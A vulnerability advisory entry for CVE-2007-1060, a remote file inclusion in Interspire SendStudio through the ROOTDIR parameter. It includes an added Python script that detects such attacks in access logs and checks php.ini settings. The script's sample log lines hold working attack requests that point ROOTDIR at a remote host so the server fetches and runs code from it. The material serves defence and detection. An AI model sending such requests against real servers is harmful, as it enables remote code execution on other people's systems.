PT-2007-2488 · Interspire · Interspire Sendstudio

M.Hasran Addahroni · Published 2007-02-22 · Updated 2018-10-16 · CVE-2007-1060

CVSS v2.0: 6.8 (Medium)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: Interspire SendStudio versions 2004.14 and earlier
Description: The issue allows remote attackers to execute arbitrary PHP code when the PHP settings register_globals and allow_url_fopen are enabled. It is triggered by supplying a URL in the ROOTDIR parameter of specific PHP files, including createemails.inc.php and sendemails.inc.php in the /admin/includes/ directory (a remote file inclusion).
Recommendations: For Interspire SendStudio versions 2004.14 and earlier, consider disabling the register_globals and allow_url_fopen settings to prevent exploitation. Additionally, restrict access to the /admin/includes/ directory and to the createemails.inc.php and sendemails.inc.php files to minimize the risk of arbitrary PHP code execution.
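As an added example (not from the advisory, the vendor or the database), the Python below flags access-log requests that hand a URL to the ROOTDIR parameter of the two affected include files and audits php.ini text for the two settings the recommendation names; the log lines, the ini text and the set of URL schemes treated as remote are constructed assumptions.

```python
"""Defender-side checks for ROOTDIR remote file inclusion (CVE-2007-1060).
Added example, not vendor code; assumes combined-format (Apache-style) access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

AFFECTED_FILES = {"createemails.inc.php", "sendemails.inc.php"}  # named in the advisory
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}  # assumption: schemes worth flagging
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
INI_RE = re.compile(r"^\s*(register_globals|allow_url_fopen)\s*=\s*([^\s;]+)", re.I | re.M)

def is_rootdir_rfi(request_target):
    """True when an affected include under /admin/includes/ receives a URL in ROOTDIR."""
    parts = urlsplit(request_target)
    path = parts.path.lower()
    if "/admin/includes/" not in path or path.rsplit("/", 1)[-1] not in AFFECTED_FILES:
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("ROOTDIR", []):
        # parse_qs decodes once; unquote again so double-encoded values are still seen
        if urlsplit(unquote(value)).scheme.lower() in REMOTE_SCHEMES:
            return True
    return False

def scan_access_log(lines):
    """Return (client ip, request target, status) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rootdir_rfi(m["path"]):
            hits.append((m["ip"], m["path"], m["status"]))
    return hits

def risky_ini_settings(ini_text):
    """Names of the two settings the advisory says to disable that are still enabled."""
    enabled = set()
    for name, value in INI_RE.findall(ini_text):
        if value.strip("\"'").lower() in {"on", "1", "true", "yes"}:
            enabled.add(name.lower())
    return sorted(enabled)

SAMPLE_LOG = [  # constructed lines; 203.0.113.5 is a documentation-range address
    '192.0.2.10 - - [22/Feb/2007:10:00:01 +0000] "GET /admin/index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Feb/2007:10:00:02 +0000] "GET /admin/includes/createemails.inc.php?ROOTDIR=http://203.0.113.5/x.txt HTTP/1.1" 200 0',
    '198.51.100.7 - - [22/Feb/2007:10:00:03 +0000] "GET /admin/includes/sendemails.inc.php?ROOTDIR=https%3A%2F%2F203.0.113.5%2Fx.txt HTTP/1.1" 200 0',
    '192.0.2.11 - - [22/Feb/2007:10:00:04 +0000] "GET /admin/includes/sendemails.inc.php?ROOTDIR=/var/www/sendstudio HTTP/1.1" 403 0',
]
SAMPLE_INI = "register_globals = On\nallow_url_fopen = Off\n; allow_url_fopen = On\n"  # constructed
if __name__ == "__main__":
    for ip, target, status in scan_access_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {target} (status {status})")
    print("risky settings enabled:", risky_ini_settings(SAMPLE_INI))
```

A local path in ROOTDIR is deliberately not flagged here, since the advisory concerns URLs fetched through allow_url_fopen; widen REMOTE_SCHEMES if your deployment also exposes wrappers such as php:// or data://.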


Related Identifiers

CVE-2007-1060

Affected Products

Interspire Sendstudio